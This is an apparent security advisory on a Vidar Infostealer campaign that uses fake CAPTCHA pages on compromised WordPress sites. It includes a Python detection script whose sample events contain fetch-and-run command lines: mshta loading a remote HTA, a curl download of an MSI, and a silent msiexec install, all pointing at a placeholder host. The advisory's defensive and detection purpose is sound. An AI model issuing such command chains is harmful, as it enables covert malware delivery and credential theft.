A recent campaign distributing the Vidar Infostealer through compromised WordPress websites demonstrates a growing shift from vulnerability exploitation toward social engineering-driven attacks. Victims are presented with deceptive fake CAPTCHA prompts that instruct them to execute malicious commands manually, enabling attackers to bypass traditional browser-based protections and security controls.
The multi-stage infection chain abuses legitimate Windows utilities such as mshta.exe, curl.exe, and msiexec.exe to covertly deliver malware that executes primarily in memory. Once deployed, the Vidar Infostealer harvests credentials, browser cookies, session tokens, autofill data, and cryptocurrency wallet information while minimizing forensic visibility. This campaign highlights the increasing enterprise risk posed by trusted websites being weaponized as malware delivery infrastructure and reinforces the need for stronger endpoint controls, user awareness, and behavioural threat detection.
The attack chain begins with compromised WordPress websites injecting malicious iframe content that redirects users to fake CAPTCHA verification pages designed to imitate legitimate verification workflows. Victims are socially engineered into executing a malicious MSHTA command, which retrieves a remote HTA payload hosted on attacker-controlled infrastructure.
The downloaded HTA script performs environment validation, applies XOR-based string obfuscation, checks installed security products using WMI queries, and creates hidden working directories within AppData locations. It then downloads a malicious MSI installer using curl.exe and silently executes it through msiexec.exe.
The MSI launches a Go-based malware loader responsible for conducting anti-analysis operations, including debugger detection and timing validation checks. The loader decrypts and injects the Vidar Infostealer payload directly into memory, enabling fileless execution while reducing on-disk artifacts and bypassing conventional endpoint defences.
Once active, Vidar extracts browser credentials, session cookies, saved autofill information, cryptocurrency wallet data, and other sensitive information before communicating with attacker-controlled command-and-control infrastructure for data exfiltration. The full attack chain is detailed below.
Delivery and Infection Chain:
The campaign relies heavily on compromised legitimate websites and social engineering rather than traditional exploit-based delivery methods.
Technical Capabilities:
The campaign demonstrates advanced evasion and stealth techniques through extensive abuse of Living-off-the-Land Binaries (LOLBins), including mshta.exe, curl.exe, and msiexec.exe, allowing malicious activity to blend into legitimate Windows operations.
The HTA payload employs XOR-based obfuscation, WMI-based security product enumeration, and removal of forensic indicators such as Zone Identifier metadata. Hidden directories are created within AppData paths to conceal operational artifacts and staging components.
The Go-based loader incorporates anti-analysis and sandbox evasion techniques, including debugger detection through APIs such as CheckRemoteDebuggerPresent and IsDebuggerPresent, along with timing-based validation mechanisms using QueryPerformanceCounter and GetTickCount.
The Vidar payload executes entirely in memory, significantly reducing forensic visibility while enabling theft of browser credentials, session tokens, autofill data, and cryptocurrency wallet information. Stolen data is exfiltrated through encrypted communication channels to the remote attacker infrastructure.
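The process chain described above (explorer.exe launching mshta.exe with a remote URL, mshta.exe spawning curl.exe and msiexec.exe, and a silent MSI install staged from AppData) is unusual enough to alert on. The following Python script is an added example, not part of the original advisory: it runs three simple rules over constructed Sysmon-style process-creation events (the domain, paths and PIDs are made up).

```python
import json
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (not real telemetry); the chain
# mirrors the one in the advisory: explorer.exe (Win+R paste) -> mshta.exe -> curl.exe / msiexec.exe.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 4200, "ppid": 900, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://cdn.example.invalid/verify.hta"},
    {"pid": 4300, "ppid": 4200, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -s -o C:\Users\u\AppData\Roaming\.cache\setup.msi https://cdn.example.invalid/setup.msi"},
    {"pid": 4400, "ppid": 4200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\u\AppData\Roaming\.cache\setup.msi /qn"},
    {"pid": 4500, "ppid": 900, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\u\Downloads\tool.msi"},  # interactive install from Downloads: not flagged
])

URL_RE = re.compile(r"https?://", re.I)
QUIET_RE = re.compile(r"(^|\s)/(qn|qb|quiet|q)\b", re.I)
LOLBINS = {"curl.exe", "msiexec.exe"}

def parse_events(log_text):
    """One JSON object per line -> list of event dicts."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]

def detect(events):
    """Return (pid, rule) findings for the ClickFix-style LOLBin chain."""
    by_pid = {e["pid"]: e for e in events}
    name = lambda e: PureWindowsPath(e["image"]).name.lower()
    findings = []
    for e in events:
        img, cmd = name(e), e["cmd"]
        parent = by_pid.get(e["ppid"])
        # Rule 1: mshta.exe fetching an HTA from a remote URL.
        if img == "mshta.exe" and URL_RE.search(cmd):
            findings.append((e["pid"], "mshta_remote_url"))
        # Rule 2: mshta.exe is a rare parent for curl.exe or msiexec.exe.
        if img in LOLBINS and parent is not None and name(parent) == "mshta.exe":
            findings.append((e["pid"], "mshta_spawned_lolbin"))
        # Rule 3: silent MSI install staged from a user-writable AppData path.
        if img == "msiexec.exe" and QUIET_RE.search(cmd) and "\\appdata\\" in cmd.lower():
            findings.append((e["pid"], "quiet_msi_from_appdata"))
    return findings

if __name__ == "__main__":
    for pid, rule in detect(parse_events(SAMPLE_LOG)):
        print(f"pid {pid}: {rule}")
```

Rule 2 in particular is low-noise in most enterprise fleets, since mshta.exe rarely needs to spawn a downloader or an installer.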
Attribution and Evolution:
While no specific threat actor has been conclusively attributed to this campaign, the observed techniques align closely with financially motivated cybercriminal groups known for distributing infostealers and credential theft malware.
The campaign reflects the continued evolution of ClickFix-style social engineering attacks, where fake CAPTCHA workflows replace traditional exploit kits as the primary infection mechanism. Since 2024, these campaigns have increasingly incorporated modular loaders, stronger obfuscation techniques, and compromised legitimate websites to improve reliability and evade detection.
Active Campaign and Geographic Spread:
The campaign has been observed impacting users across Italy, France, the United States, the United Kingdom, and Brazil through compromised WordPress websites hosting malicious iframe content.
Since 2024, threat actors behind similar infostealer operations have incorporated stronger obfuscation methods, modular Go-based loaders, and more reliable payload delivery using compromised legitimate websites rather than attacker-owned infrastructure. This significantly increases campaign scalability and reduces the likelihood of immediate detection or blocking.
Although the currently observed activity spans multiple international regions, the delivery techniques are globally applicable and pose risk to organizations across all sectors, including enterprises throughout the UAE and GCC region that rely heavily on browser-based SaaS platforms and cloud applications.
Conclusion:
This campaign demonstrates the growing effectiveness of user-driven compromise techniques where attackers manipulate trusted websites and legitimate system utilities rather than relying solely on software vulnerabilities. The combination of fake CAPTCHA social engineering, LOLBin abuse, and in-memory malware execution creates a highly evasive attack chain capable of bypassing traditional security controls.
Organizations should strengthen behavioral monitoring, restrict unnecessary command execution, improve detection of suspicious process chains, and prioritize user awareness training to reduce the risk of compromise from increasingly sophisticated infostealer campaigns.
Successful infection with the Vidar Infostealer can result in theft of enterprise credentials, browser session tokens, saved passwords, cryptocurrency wallet information, and sensitive autofill data. Stolen session tokens may allow attackers to bypass multi-factor authentication protections and maintain unauthorized access to enterprise services.
Compromised systems may also serve as entry points for lateral movement, additional malware deployment, ransomware activity, or broader account compromise. For organizations in the UAE and GCC, credential theft impacting regulated environments may trigger compliance and reporting obligations under frameworks such as UAE PDPL and NCA ECC.
Given the widespread use of Microsoft 365, browser-based SaaS applications, and cloud platforms across enterprise environments, this campaign presents substantial operational, financial, and reputational risk across industries globally.